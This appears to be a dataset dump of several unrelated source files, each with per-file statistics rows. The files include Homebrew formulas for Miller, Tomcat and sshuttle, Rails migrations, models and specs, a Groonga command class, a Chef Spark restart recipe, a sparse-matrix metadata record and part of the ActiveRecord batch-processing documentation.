    assert_equal "\nDafny program verifier finished with 1 verified, 0 errors\n",
                 shell_output("#{bin}/dafny /compile:0 #{testpath}/test.dfy")
    assert_equal "\nDafny program verifier finished with 1 verified, 0 errors\nRunning...\n\nhello, Dafny\n",
                 shell_output("#{bin}/dafny /compile:3 #{testpath}/test.dfy")
    assert_equal "Z3 version 4.8.5 - 64 bit\n",
                 shell_output("#{libexec}/z3/bin/z3 -version")
  end
end
| 34.869565 | 122 | 0.691189 |
# Relaxes the NOT NULL constraint on images.post_id so an image can exist
# without an associated post.
# NOTE(review): no migration version bracket — presumably a pre-5.0 Rails app.
class AllowImagesPostIdToBeNull < ActiveRecord::Migration
  def change
    change_column_null :images, :post_id, true
  end
end
| 21.333333 | 57 | 0.789063 |
1a61341f52327f1ba14ea5905b3a7e200548896f | 1,735 | class Miller < Formula
desc "Like sed, awk, cut, join & sort for name-indexed data such as CSV"
homepage "https://github.com/johnkerl/miller"
url "https://github.com/johnkerl/miller/releases/download/v5.9.1/mlr-5.9.1.tar.gz"
sha256 "fb531efe5759b99935ce420c8ad763099cf11c2db8d32e8524753f4271454b57"
license "BSD-2-Clause"
head "https://github.com/johnkerl/miller.git"
bottle do
cellar :any_skip_relocation
sha256 "775f496bb2d1aaee32a3bb103eb85cfb7b8c4937972b36f7c3960f4a826ca05d" => :big_sur
sha256 "f723f639b78b03e09657ec505aaac48b7971fbe924b4269f860f1bc97f7db9cc" => :catalina
sha256 "36c0835f067998aa8458762915d3cfaf8304170fe47433c43f7001a302110e08" => :mojave
sha256 "e034b65d138c356931f0c29d5808d6d8cbc3468bfb7a0007edd37637f0dd265b" => :high_sierra
sha256 "a3c9b74132a763ed2b167757853a8db00df69da59204176e496d56ce586b7412" => :x86_64_linux
end
depends_on "autoconf" => :build
depends_on "automake" => :build
depends_on "libtool" => :build
uses_from_macos "flex" => :build
def install
  # Profiling build fails with Xcode 11, remove it
  inreplace "c/Makefile.am", /noinst_PROGRAMS=\s*mlrg/, ""

  # Regenerate the autotools build system after editing Makefile.am.
  system "autoreconf", "-fvi"
  system "./configure", "--prefix=#{prefix}", "--disable-silent-rules",
                        "--disable-dependency-tracking"
  system "make"
  # Time zone related tests fail. Reported upstream https://github.com/johnkerl/miller/issues/237
  system "make", "check" if !OS.mac? && ENV["CI"]
  system "make", "install"
end
test do
  # Smoke test: cut a single column out of a small CSV with the
  # installed mlr binary and check the expected values come back.
  (testpath/"test.csv").write <<~EOS
    a,b,c
    1,2,3
    4,5,6
  EOS
  output = pipe_output("#{bin}/mlr --csvlite cut -f a test.csv")
  assert_match /a\n1\n4\n/, output
end
end
| 36.914894 | 99 | 0.712392 |
33db91fee94e394a564647ee2677f9b61bd5f087 | 1,456 | {
matrix_id: '2094',
name: 'n3c5-b6',
group: 'JGD_Homology',
description: 'Simplicial complexes from Homology from Volkmar Welker.',
author: 'V. Welker',
editor: 'J.-G. Dumas',
date: '2008',
kind: 'combinatorial problem',
problem_2D_or_3D: '0',
num_rows: '120',
num_cols: '210',
nonzeros: '840',
num_explicit_zeros: '0',
num_strongly_connected_components: '1',
num_dmperm_blocks: '1',
structural_full_rank: 'true',
structural_rank: '120',
pattern_symmetry: '0.000',
numeric_symmetry: '0.000',
rb_type: 'integer',
structure: 'rectangular',
cholesky_candidate: 'no',
positive_definite: 'no',
notes: 'Simplicial complexes from Homology from Volkmar Welker.
From Jean-Guillaume Dumas\' Sparse Integer Matrix Collection,
http://ljk.imag.fr/membres/Jean-Guillaume.Dumas/simc.html
http://www.mathematik.uni-marburg.de/~welker/
Filename in JGD collection: Homology/n3c5.b6.120x210.sms
',
norm: '3.162278e+00',
min_singular_value: '2.457934e-17',
condition_number: '128655942511552272',
svd_rank: '84',
sprank_minus_rank: '36',
null_space_dimension: '36',
full_numerical_rank: 'no',
svd_gap: '1242566669259700.250000',
image_files: 'n3c5-b6.png,n3c5-b6_svd.png,n3c5-b6_graph.gif,',
}
| 33.860465 | 75 | 0.611264 |
26dfe68cd010cf76f572ae9ad30f0bae93fd1357 | 1,306 | module Groonga
class Command
  # Registry mapping a command name to its implementing class.
  @@classes = {}

  class << self
    # Registers klass as the handler for the command called name.
    def register_class(name, klass)
      @@classes[name] = klass
    end

    # Returns the handler class for name, or nil if none is registered.
    def find_class(name)
      @@classes[name]
    end
  end

  private
  # Lazily resolved execution context -- presumably a process-wide
  # singleton (see Context.instance).
  def context
    @context ||= Context.instance
  end

  def writer
    @writer ||= context.writer
  end

  def query_logger
    @query_logger ||= context.query_logger
  end

  # Cache key for the given request input. The base implementation
  # returns nil, i.e. a command is not cached unless a subclass
  # overrides this.
  def cache_key(input)
    nil
  end

  # Runs the block, serving/storing its output through the cache when a
  # key is given. On a hit the cached bytes become the context output
  # and a query-log line is emitted; on a miss the block runs and its
  # output is stored unless options[:update] is falsy.
  def cache_output(key, options={})
    if key.nil?
      yield
    else
      cache = Cache.current
      cached_value = cache.fetch(key)
      if cached_value
        context.output = cached_value
        query_logger.log(:cache, ":", "cache(#{cached_value.bytesize})")
      else
        yield
        cache.update(key, context.output) if options[:update]
      end
    end
  end

  # Entry point used by subclasses: runs run_body through the cache.
  # A request carrying cache=no skips storing a fresh result. Errors are
  # recorded on the context and nil is returned instead of raising.
  def run_internal(input)
    begin
      options = {
        :update => (input["cache"] != "no"),
      }
      cache_output(cache_key(input), options) do
        run_body(input)
      end
    rescue GroongaError => groonga_error
      context.set_groonga_error(groonga_error)
      nil
    rescue => error
      context.record_error(:command_error, error)
      nil
    end
  end
end
end
| 20.092308 | 74 | 0.557427 |
f8a851a7b70b5cb3a1f6b3e0bc264c98ff66cc8e | 119 | class AddTimeToLessons < ActiveRecord::Migration[5.1]
# Add a nullable datetime column `time` to the lessons table.
# add_column is reversible, so a `change` method is sufficient.
def change
  add_column(:lessons, :time, :datetime)
end
end
| 19.833333 | 53 | 0.739496 |
f8306555a2aeae37110959ff4c5b5a40249f0fc8 | 356 | module Findable
extend ActiveSupport::Concern
module ClassMethods
  # Fetches a single document by id through Elasticsearch and returns
  # the raw "hits" section of the response with its keys deep-symbolized.
  def find_by_id(id)
    body = ::IdQuery.new(id).generate_search_body
    response = ES.client.search(index: index_names, body: body)
    response['hits'].deep_symbolize_keys
  end
end
end
| 19.777778 | 47 | 0.648876 |
9116d711b36c2b2b4adc1bbe90b61302d3c516ad | 1,426 | class Tomcat < Formula
homepage "https://tomcat.apache.org/"
url "https://www.apache.org/dyn/closer.cgi?path=tomcat/tomcat-8/v8.0.23/bin/apache-tomcat-8.0.23.tar.gz"
mirror "https://archive.apache.org/dist/tomcat/tomcat-8/v8.0.23/bin/apache-tomcat-8.0.23.tar.gz"
sha256 "c98b19a1edaaef2859991f304d0ec8f29c5ccacc6d63a0bc8bf7078d63191a38"

bottle do
  cellar :any
  sha256 "5c43653281e5e7099230ebb76616583935538140b7802ec5d0fdbb719ccdc5e0" => :yosemite
  sha256 "caa72406f8f0f60d56dd656aa31e6170194df58d97c7f4661c93624771106c6b" => :mavericks
  sha256 "0fd6ba9c446dc1cf03c7dc1d537f61b879f8f1d194bf998cb1a0353a09e21831" => :mountain_lion
end

option "with-fulldocs", "Install full documentation locally"

# Optional documentation bundle, installed only with --with-fulldocs.
resource "fulldocs" do
  url "https://www.apache.org/dyn/closer.cgi?path=/tomcat/tomcat-8/v8.0.23/bin/apache-tomcat-8.0.23-fulldocs.tar.gz"
  mirror "https://archive.apache.org/dist/tomcat/tomcat-8/v8.0.23/bin/apache-tomcat-8.0.23-fulldocs.tar.gz"
  version "8.0.23"
  sha256 "bd0c85d48ccd6f0b7838e55215a7e553a8b9b58fd1a880560a7414940413f6d3"
end
def install
  # Remove Windows scripts
  rm_rf Dir["bin/*.bat"]

  # Install files: top-level docs at the prefix, the whole distribution
  # under libexec, and a `catalina` symlink on PATH.
  prefix.install %w[ NOTICE LICENSE RELEASE-NOTES RUNNING.txt ]
  libexec.install Dir["*"]
  bin.install_symlink "#{libexec}/bin/catalina.sh" => "catalina"
  (share/"fulldocs").install resource("fulldocs") if build.with? "fulldocs"
end
end
| 40.742857 | 118 | 0.753156 |
5d9386b257b6546efc087dc9347167bfa3b7a289 | 1,051 | class Sshuttle < Formula
# Installed into a Python virtualenv (helpers come from this mixin).
include Language::Python::Virtualenv

desc "Proxy server that works as a poor man's VPN"
homepage "https://github.com/sshuttle/sshuttle"
url "https://github.com/sshuttle/sshuttle.git",
    tag: "v1.0.4",
    revision: "abb48f199656f776be0f05601ff5746f36df3370"
license "LGPL-2.1-or-later"
head "https://github.com/sshuttle/sshuttle.git"

bottle do
  cellar :any_skip_relocation
  sha256 "a06b10df1dfc84196e2e02b32439f1e2558ef8355192ef5afc3cbfd951eb3607" => :catalina
  sha256 "7e36de2ff8ac37e23c9d54ddd393881bd7a312163a98311b23dc70d0b9bb1f7d" => :mojave
  sha256 "323c8b112631584ca559e5a588d7822b61af3d3e8eda30a3b0699710d627af0a" => :high_sierra
  sha256 "2b6d6f1376a7e9f217bb5453e817001e79774f416acc968632039db9b9e263e8" => :x86_64_linux
end

depends_on "[email protected]"
# Installs sshuttle and its declared resources into a virtualenv.
def install
  # Building the docs requires installing
  # markdown & BeautifulSoup Python modules
  # so we don't.
  virtualenv_install_with_resources
end
test do
  # Smoke test: the CLI starts up and prints its help text.
  system bin/"sshuttle", "-h"
end
end
| 31.848485 | 94 | 0.758325 |
e86d3ea198cfef6e7516b5558093fe7432ae568e | 1,129 | local_cache [@posts.map(&:id), params[:verbose]], expires: 1.hour do
# Atom feed for the current page of posts; each entry links the post
# page and attaches the preview image as an enclosure.
atom_feed :root_url => url_for(:controller => :post, :action => :index, :tags => params[:tags], :only_path => false) do |feed|
  feed.title CONFIG['app_name']
  feed.updated @posts[0].created_at if @posts.length > 0

  @posts.each do |post|
    post_url = url_for :controller => :post, :action => :show, :id => post.id, :only_path => false
    post_preview_url = URI.join root_url(:only_path => false), post.preview_url

    feed.entry post, :url => post_url, :updated => post.updated_at do |entry|
      entry.link :href => post_preview_url, :rel => 'enclosure'
      # Entry title reads "<tags> [WxH]".
      entry.title '%s [%s]' % [post.cached_tags, "#{post.width}x#{post.height}"]
      entry.summary post.cached_tags
      entry.content render(:partial => 'post_atom', :formats => :html, :locals => { :post => post, :post_url => post_url }), :type => 'html'
      entry.author do |author|
        author.name post.author
        author.uri url_for(:controller => :user, :action => :show, :id => post.user_id, :only_path => false)
      end
    end
  end
end
end
| 53.761905 | 142 | 0.621789 |
6a969c9e751d2854e5b714bf678423e99e474f85 | 191 | RSpec.describe JbaezViewTool do
it "has a version number" do
  expect(JbaezViewTool::VERSION).not_to be nil
end

# NOTE(review): this is the default bundler gem-scaffold placeholder and
# always fails; replace it with a real spec of the gem's behaviour.
it "does something useful" do
  expect(false).to eq(true)
end
end
| 19.1 | 48 | 0.717277 |
abc086afb2b9de4fda74d7567f043672bb314a4b | 500 | require 'spec_helper'
# Unit tests for the swift::proxy::healthcheck class: it should add a
# concat fragment declaring the [filter:healthcheck] paste section.
describe 'swift::proxy::healthcheck' do

  let :facts do
    {}
  end

  let :pre_condition do
    'class { "concat::setup": }
     concat { "/etc/swift/proxy-server.conf": }'
  end

  # Path of the concat fragment the class is expected to manage.
  let :fragment_file do
    "/var/lib/puppet/concat/_etc_swift_proxy-server.conf/fragments/25_swift_healthcheck"
  end

  # BUG FIX: the brackets were previously unescaped (/[filter:healthcheck]/),
  # which Ruby parses as a character class matching any single one of those
  # characters -- the expectation passed for almost any content. Escaping
  # the brackets matches the literal INI section header.
  it { should contain_file(fragment_file).with_content(/\[filter:healthcheck\]/) }
  it { should contain_file(fragment_file).with_content(/use = egg:swift#healthcheck/) }
end
| 22.727273 | 88 | 0.708 |
e2da7bd23a333a571265f67f84fa4b2d761811fb | 4,030 | describe PaynetApi::ReportRequest do
# Shared fixtures: a minimal valid request, a fully-optioned request,
# and two invalid constructions used by the error cases below.
let(:test_id_from_paynet) { "59206906" }
let(:request) { PaynetApi::ReportRequest.new(paynet_id: test_id_from_paynet, payment_comprehensive: "1") }
let(:request_with_options) { PaynetApi::ReportRequest.new(
  paynet_id: test_id_from_paynet,
  payment_comprehensive: "1",
  business_background: "1",
  public_filings: "1",
  ucc_filings: "1",
  legal_name: "1",
  transpo_score: "2",
  office_score: "1",
  constr_score: "1",
  master_score: "2",
  expanded_vars: "1"
) }
let(:request_without_paynet_id) { PaynetApi::ReportRequest.new }
let(:request_without_any_reports_chosen) { PaynetApi::ReportRequest.new(paynet_id: test_id_from_paynet) }

subject { request }

describe ".FORMAT" do
  it "defaults to nil" do
    expect(subject.class::FORMAT).to eq(nil)
  end
end

describe "#initialize" do
  context "with required params passed in" do
    its (:paynet_id){ should eq(test_id_from_paynet) }
    # Randomly picking one of the reports to pass in:
    # payment comprehensive isn't required, but passing in ONE report IS.
    its (:payment_comprehensive){ should eq("1") }

    context "with optional arguments" do
      subject { request_with_options }

      its (:payment_comprehensive){ should eq("1") }
      its (:business_background){ should eq("1") }
      its (:public_filings){ should eq("1") }
      its (:ucc_filings){ should eq("1") }
      its (:legal_name){ should eq("1") }
      its (:transpo_score){ should eq("2") }
      its (:office_score){ should eq("1") }
      its (:constr_score){ should eq("1") }
      its (:master_score){ should eq("2") }
      its (:expanded_vars){ should eq("1") }
    end

    context "without optional arguments" do
      its (:business_background){ should eq(nil) }
      its (:public_filings){ should eq(nil) }
      its (:ucc_filings){ should eq(nil) }
      its (:legal_name){ should eq(nil) }
      its (:transpo_score){ should eq(nil) }
      its (:office_score){ should eq(nil) }
      its (:constr_score){ should eq(nil) }
      its (:master_score){ should eq(nil) }
      its (:expanded_vars){ should eq(nil) }
    end
  end

  context "without a paynet_id passed in" do
    it "raises an argument error" do
      expect{ request_without_paynet_id }.to raise_error(ArgumentError, "missing keyword: paynet_id")
    end
  end

  context "without any report chosen" do
    it "raises an argument error" do
      expect{ request_without_any_reports_chosen }.to raise_error(ArgumentError, "You must pass in a value for at least one of the following params: payment_comprehensive, business_background, public_filings, ucc_filings, legal_name, transpo_score, office_score, constr_score, master_score, or expanded_vars")
    end
  end
end

describe "#query" do
  # NOTE(review): URI.encode is deprecated and removed in Ruby 3.0+;
  # these expectations will need updating alongside the implementation.
  let(:query) { URI.encode("password=#{ENV["BASIC_AUTH_PASSWORD"]}&payment_comprehensive=1&paynet_id=#{subject.paynet_id}&user=#{ENV["BASIC_AUTH_USER"]}&version=0320") }

  context "with required arguments" do
    it "creates the correct encoded path with params for Paynet" do
      expect(subject.query).to eq(query)
    end
  end

  context "with optional arguments" do
    let(:query_with_options) { URI.encode("business_background=#{subject.business_background}&constr_score=#{subject.constr_score}&expanded_vars=#{subject.expanded_vars}&legal_name=#{subject.legal_name}&master_score=#{subject.master_score}&office_score=#{subject.office_score}&password=#{ENV["BASIC_AUTH_PASSWORD"]}&payment_comprehensive=#{subject.payment_comprehensive}&paynet_id=#{subject.paynet_id}&public_filings=#{subject.public_filings}&transpo_score=#{subject.transpo_score}&ucc_filings=#{subject.ucc_filings}&user=#{ENV["BASIC_AUTH_USER"]}&version=0320") }
    subject { request_with_options }

    it "creates the correct encoded query with params for Paynet" do
      expect(subject.query).to eq(query_with_options)
    end
  end
end
end
| 41.979167 | 566 | 0.685112 |
33c85a5e96480d1656144d58d702ec127d19a8cd | 7,219 | # Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
module Azure::Labservices::Mgmt::V2018_10_15
module Models
#
# Represents an image from the Azure Marketplace
#
# NOTE: generated by AutoRest (see file header); manual edits here will
# be lost on regeneration.
class GalleryImage < Resource

  include MsRestAzure

  # @return [String] The author of the gallery image.
  attr_accessor :author

  # @return [DateTime] The creation date of the gallery image.
  attr_accessor :created_date

  # @return [String] The description of the gallery image.
  attr_accessor :description

  # @return [GalleryImageReference] The image reference of the gallery
  # image.
  attr_accessor :image_reference

  # @return [String] The icon of the gallery image.
  attr_accessor :icon

  # @return [Boolean] Indicates whether this gallery image is enabled.
  attr_accessor :is_enabled

  # @return [Boolean] Indicates whether this gallery has been overridden
  # for this lab account
  attr_accessor :is_override

  # @return [String] The third party plan that applies to this image
  attr_accessor :plan_id

  # @return [Boolean] Indicates if the plan has been authorized for
  # programmatic deployment.
  attr_accessor :is_plan_authorized

  # @return [String] The provisioning status of the resource.
  attr_accessor :provisioning_state

  # @return [String] The unique immutable identifier of a resource (Guid).
  attr_accessor :unique_identifier

  # @return [LatestOperationResult] The details of the latest operation.
  # ex: status, error
  attr_accessor :latest_operation_result


  #
  # Mapper for GalleryImage class as Ruby Hash.
  # This will be used for serialization/deserialization.
  #
  def self.mapper()
    {
      client_side_validation: true,
      required: false,
      serialized_name: 'GalleryImage',
      type: {
        name: 'Composite',
        class_name: 'GalleryImage',
        model_properties: {
          id: {
            client_side_validation: true,
            required: false,
            read_only: true,
            serialized_name: 'id',
            type: {
              name: 'String'
            }
          },
          name: {
            client_side_validation: true,
            required: false,
            read_only: true,
            serialized_name: 'name',
            type: {
              name: 'String'
            }
          },
          type: {
            client_side_validation: true,
            required: false,
            read_only: true,
            serialized_name: 'type',
            type: {
              name: 'String'
            }
          },
          location: {
            client_side_validation: true,
            required: false,
            serialized_name: 'location',
            type: {
              name: 'String'
            }
          },
          tags: {
            client_side_validation: true,
            required: false,
            serialized_name: 'tags',
            type: {
              name: 'Dictionary',
              value: {
                client_side_validation: true,
                required: false,
                serialized_name: 'StringElementType',
                type: {
                  name: 'String'
                }
              }
            }
          },
          author: {
            client_side_validation: true,
            required: false,
            read_only: true,
            serialized_name: 'properties.author',
            type: {
              name: 'String'
            }
          },
          created_date: {
            client_side_validation: true,
            required: false,
            read_only: true,
            serialized_name: 'properties.createdDate',
            type: {
              name: 'DateTime'
            }
          },
          description: {
            client_side_validation: true,
            required: false,
            read_only: true,
            serialized_name: 'properties.description',
            type: {
              name: 'String'
            }
          },
          image_reference: {
            client_side_validation: true,
            required: false,
            read_only: true,
            serialized_name: 'properties.imageReference',
            type: {
              name: 'Composite',
              class_name: 'GalleryImageReference'
            }
          },
          icon: {
            client_side_validation: true,
            required: false,
            read_only: true,
            serialized_name: 'properties.icon',
            type: {
              name: 'String'
            }
          },
          is_enabled: {
            client_side_validation: true,
            required: false,
            serialized_name: 'properties.isEnabled',
            type: {
              name: 'Boolean'
            }
          },
          is_override: {
            client_side_validation: true,
            required: false,
            serialized_name: 'properties.isOverride',
            type: {
              name: 'Boolean'
            }
          },
          plan_id: {
            client_side_validation: true,
            required: false,
            read_only: true,
            serialized_name: 'properties.planId',
            type: {
              name: 'String'
            }
          },
          is_plan_authorized: {
            client_side_validation: true,
            required: false,
            serialized_name: 'properties.isPlanAuthorized',
            type: {
              name: 'Boolean'
            }
          },
          provisioning_state: {
            client_side_validation: true,
            required: false,
            serialized_name: 'properties.provisioningState',
            type: {
              name: 'String'
            }
          },
          unique_identifier: {
            client_side_validation: true,
            required: false,
            serialized_name: 'properties.uniqueIdentifier',
            type: {
              name: 'String'
            }
          },
          latest_operation_result: {
            client_side_validation: true,
            required: false,
            read_only: true,
            serialized_name: 'properties.latestOperationResult',
            type: {
              name: 'Composite',
              class_name: 'LatestOperationResult'
            }
          }
        }
      }
    }
  end
end
end
end
| 31.251082 | 78 | 0.462252 |
f81ba52b7ea4660c73380e5bdaf5aa386c376c1f | 26 | module FixturesHelper
end
| 8.666667 | 21 | 0.884615 |
f891346853bb82b570daf1e8481a3a97b378d758 | 565 | Pod::Spec.new do |s|
# CocoaPods metadata for the NanoStore pod; links against the system
# sqlite3 library and requires ARC.
s.name          = 'NanoStore'
s.version       = '2.5.3'
s.license       = 'BSD'
s.summary       = 'NanoStore is an open source, lightweight schema-less local key-value document store written in Objective-C for Mac OS X and iOS.'
s.homepage      = 'https://github.com/tciuro/NanoStore'
s.authors       = { 'Tito Ciuro' => '[email protected]' }
s.source        = { :git => 'https://github.com/tciuro/NanoStore.git', :tag => '2.5.3' }
s.source_files  = 'Classes/**/*.{h,m}'
s.library       = 'sqlite3'
s.requires_arc  = true
end
| 40.357143 | 150 | 0.589381 |
03eb7462ece037c95983a47d363881ec8df1e287 | 887 | # frozen_string_literal: true
class AuditEvent < ApplicationRecord
  include CreatedAtFilterable

  # `details` is persisted as a serialized Hash column.
  serialize :details, Hash # rubocop:disable Cop/ActiveRecordSerialize

  # Author of the audited action; the FK column is author_id.
  belongs_to :user, foreign_key: :author_id

  validates :author_id, presence: true
  validates :entity_id, presence: true
  validates :entity_type, presence: true

  scope :by_entity_type, -> (entity_type) { where(entity_type: entity_type) }
  scope :by_entity_id, -> (entity_id) { where(entity_id: entity_id) }
  scope :order_by_id_desc, -> { order(id: :desc) }
  scope :order_by_id_asc, -> { order(id: :asc) }

  after_initialize :initialize_details

  # Guarantees `details` is a Hash even for freshly built or legacy rows.
  def initialize_details
    self.details = {} if details.nil?
  end

  def author_name
    self.user.name
  end

  # Returns details with the :from/:to values stringified for display;
  # all other entries pass through unchanged.
  def formatted_details
    details.merge(details.slice(:from, :to).transform_values(&:to_s))
  end
end
# Let the EE edition extend this model when EE::AuditEvent is defined.
AuditEvent.prepend_if_ee('EE::AuditEvent')
| 25.342857 | 77 | 0.739572 |
1ad14f2f569d91295031d2f4e73aef0020037bf8 | 360 | cask "font-amstelvar-alpha" do
# The upstream artifact is unversioned, so there is no checksum to pin.
version :latest
sha256 :no_check

# github.com/google/fonts/ was verified as official when first introduced to the cask
url "https://github.com/google/fonts/raw/master/ofl/amstelvaralpha/AmstelvarAlpha-VF.ttf"
name "Amstelvar Alpha"
homepage "https://fonts.google.com/earlyaccess"

font "AmstelvarAlpha-VF.ttf"
end
| 30 | 91 | 0.763889 |
f866bc29e693f7205b85e86701194e8944e729ff | 1,340 | require 'rails_helper'
# Model specs for User: validation messages/length limits and the
# follower-graph associations.
RSpec.describe User, type: :model do
  describe 'Validations' do
    it do
      should validate_presence_of(:username)
        .with_message('Username cannot be blank')
    end

    it do
      should validate_length_of(:username)
        .is_at_most(10)
        .with_message('Maximum allowed username is 10 characters.')
    end

    # Guard against the limits drifting: these bounds must NOT hold.
    it { should_not validate_length_of(:username).is_at_least(2) }
    it { should_not validate_length_of(:username).is_at_most(11) }

    it { should validate_uniqueness_of(:username).case_insensitive.with_message('Username already taken.') }

    it do
      should validate_presence_of(:fullname)
        .with_message('FullName cannot be blank')
    end

    it do
      should validate_length_of(:fullname)
        .is_at_most(20)
        .with_message('Maximum allowed fullname is 20 characters.')
    end

    it do
      should_not validate_length_of(:fullname)
        .is_at_least(5)
        .with_message('Minimum allowed characters for fullname is 6')
    end
  end

  describe 'Associations' do
    it { should have_many(:opinions).with_foreign_key(:author_id) }
    it { should have_many(:followings).with_foreign_key(:follower_id) }
    it { should have_many(:follows).through(:followings) }
    it { should have_many(:followers).through(:inverse_followings) }
  end
end
| 31.162791 | 108 | 0.695522 |
e974dc519d69ca552fd6b2bafa223331252efb86 | 1,658 | # frozen_string_literal: true
require 'spec_helper'
# Specs for the TraceChunks Redis wrapper: shared wrapper behaviour plus
# the config-file resolution fallback chain.
RSpec.describe Gitlab::Redis::TraceChunks do
  let(:instance_specific_config_file) { "config/redis.trace_chunks.yml" }
  let(:environment_config_file_name) { "GITLAB_REDIS_TRACE_CHUNKS_CONFIG_FILE" }
  let(:shared_state_config_file) { nil }

  before do
    allow(Gitlab::Redis::SharedState).to receive(:config_file_name).and_return(shared_state_config_file)
  end

  include_examples "redis_shared_examples"

  describe '.config_file_name' do
    subject { described_class.config_file_name }

    # Scratch Rails root so file-existence checks see a controlled tree.
    let(:rails_root) { Dir.mktmpdir('redis_shared_examples') }

    before do
      # Undo top-level stub of config_file_name because we are testing that method now.
      allow(described_class).to receive(:config_file_name).and_call_original

      allow(described_class).to receive(:rails_root).and_return(rails_root)
      FileUtils.mkdir_p(File.join(rails_root, 'config'))
    end

    after do
      FileUtils.rm_rf(rails_root)
    end

    context 'when there is only a resque.yml' do
      before do
        FileUtils.touch(File.join(rails_root, 'config/resque.yml'))
      end

      it { expect(subject).to eq("#{rails_root}/config/resque.yml") }

      context 'and there is a global env override' do
        before do
          stub_env('GITLAB_REDIS_CONFIG_FILE', 'global override')
        end

        it { expect(subject).to eq('global override') }

        # SharedState's own file takes precedence over the global override.
        context 'and SharedState has a different config file' do
          let(:shared_state_config_file) { 'shared state config file' }

          it { expect(subject).to eq('shared state config file') }
        end
      end
    end
  end
end
| 29.607143 | 104 | 0.701448 |
bf5b392fa1cc8058f1d752851eac06e0539d2bf4 | 753 | # frozen_string_literal: true
require "test_helper"
# Tests for ReplyToComponent: the quoted reply body (a ".markdown" node)
# is rendered only when show_body is passed as true.
class ReplyToComponentTest < ViewComponent::TestCase
  setup do
    @topic = create(:topic)
    @reply_to = create(:reply, topic: @topic)
    @reply = create(:reply, reply_to: @reply_to, topic: @topic)
  end

  test "normal" do
    component = ReplyToComponent.new(reply: @reply, topic: @topic)
    doc = render_inline(component)
    assert_equal 0, doc.css(".markdown").length
  end

  test "show body" do
    component = ReplyToComponent.new(reply: @reply, topic: @topic, show_body: true)
    doc = render_inline(component)
    assert_equal 1, doc.css(".markdown").length
  end

  # A nil reply renders nothing at all.
  test "nil" do
    assert_equal "", render_inline(ReplyToComponent.new(reply: nil, topic: @topic)).to_html
  end
end
| 26.892857 | 91 | 0.699867 |
33bf1372adc2bd616af6ced283051516a092af7e | 942 | module EventStore
module EntityStore
  module Controls
    # Test controls ("known good" example data) for entity-store tests.
    module Entity
      def self.example
        Current.example
      end

      class Example
        include Schema::DataStructure

        attribute :sum

        # Value equality on class and sum.
        # NOTE(review): eql?/hash are not defined alongside ==, so
        # instances are not interchangeable as Hash keys.
        def ==(other)
          other.is_a?(self.class) && other.sum == sum
        end
      end

      # Variant representing an entity already present in the cache.
      module Cached
        def self.example
          Example.build :sum => sum
        end

        # Seeds the store's cache with an example entity/version pair
        # and returns both.
        def self.add(store, id)
          entity = self.example
          version = Version::Cached.example

          store.cache.add id, entity, version, persisted_version: version

          return entity, version
        end

        def self.sum
          1
        end
      end

      # Variant representing the current (latest) entity state.
      module Current
        def self.example
          Example.build :sum => sum
        end

        def self.sum
          12
        end
      end
    end
  end
end
end
| 18.470588 | 75 | 0.488323 |
f86eeafd6b6af5ffc0fd28c0b9b157d979c81e28 | 1,117 | Gem::Specification.new do |s|
# Gem metadata for cached_record (memcached caching for ActiveRecord).
s.name = 'cached_record'
s.version = '0.0.1'
s.date = '2008-10-27'
s.summary = "memcached caching for active record"
#s.description = ""
s.authors = ['Kacper Cieśla']
s.email = '[email protected]'
s.homepage = ''
s.has_rdoc = true
s.rdoc_options = ['--main', 'README.txt']
s.rdoc_options << '--inline-source' << '--charset=UTF-8'
s.extra_rdoc_files = ['README.txt']
s.test_files = %w{test/migrations test/migrations/create_notes.rb test/migrations/create_users.rb test/models test/models/note.rb test/models/original_user.rb test/models/original_note.rb test/models/user.rb test/test_cached_record.rb test/fixtures test/fixtures/users.yml test/cases test/cases/hello.rb test/environment.rb}
s.files = %w{tasks tasks/bones.rake tasks/spec.rake tasks/notes.rake tasks/rubyforge.rake tasks/test.rake tasks/git.rake tasks/post_load.rake tasks/setup.rb tasks/svn.rake tasks/gem.rake tasks/ann.rake tasks/rdoc.rake tasks/manifest.rake Manifest.txt lib lib/cached_record lib/cached_record/base.rb lib/cached_record.rb Rakefile README.txt History.txt}
end
| 53.190476 | 355 | 0.747538 |
f72b7716b26797db89e786bd818b2bfcf934e064 | 1,103 | # spark_restart - Restart the Spark components
#
# This recipe restarts Spark on the server. It will start the
# appropriate services, depending on whether this is a designated
# Spark master.
Chef::Log.info("Running #{node['app_name']}::spark_restart")

require File.expand_path("../spark_helper.rb", __FILE__)

# Assume that this is a Spark master unless dependent configurations are found
sparkInfo = get_spark_info()
is_spark_master = sparkInfo[:is_spark_master] # NOTE(review): unused below -- confirm before removing
is_client_only = sparkInfo[:is_client_only]
configNode = sparkInfo[:config_node]

# Restart the Spark service (non-client nodes only)
service "spark" do
  action [ :restart ]
  only_if { !is_client_only }
end

# Restart the Spark Thrift Server service (client nodes with it enabled)
service "spark-thriftserver" do
  action [ :restart ]
  only_if { is_client_only && configNode.has_key?('enable_thriftserver') && configNode['enable_thriftserver'] == 'true' }
end

# Restart the Spark History Server service (client nodes with it enabled)
service "spark-historyserver" do
  action [ :restart ]
  only_if { is_client_only && configNode.has_key?('enable_historyserver') && configNode['enable_historyserver'] == 'true' }
end
| 32.441176 | 123 | 0.75884 |
91ea1756c4396a854e24bfab0388b67446171485 | 4,558 |
module ActiveRecord
  module Batches
    # Looping through a collection of records from the database
    # (using the +all+ method, for example) is very inefficient
    # since it will try to instantiate all the objects at once.
    #
    # In that case, batch processing methods allow you to work
    # with the records in batches, thereby greatly reducing memory consumption.
    #
    # The #find_each method uses #find_in_batches with a batch size of 1000 (or as
    # specified by the +:batch_size+ option).
    #
    #   Person.find_each do |person|
    #     person.do_awesome_stuff
    #   end
    #
    #   Person.where("age > 21").find_each do |person|
    #     person.party_all_night!
    #   end
    #
    # If you do not provide a block to #find_each, it will return an Enumerator
    # for chaining with other methods:
    #
    #   Person.find_each.with_index do |person, index|
    #     person.award_trophy(index + 1)
    #   end
    #
    # ==== Options
    # * <tt>:batch_size</tt> - Specifies the size of the batch. Default to 1000.
    # * <tt>:start</tt> - Specifies the starting point for the batch processing.
    #   This is especially useful if you want multiple workers dealing with
    #   the same processing queue. You can make worker 1 handle all the records
    #   between id 0 and 10,000 and worker 2 handle from 10,000 and beyond
    #   (by setting the +:start+ option on that worker).
    #
    #   # Let's process for a batch of 2000 records, skipping the first 2000 rows
    #   Person.find_each(start: 2000, batch_size: 2000) do |person|
    #     person.party_all_night!
    #   end
    #
    # NOTE: It's not possible to set the order. That is automatically set to
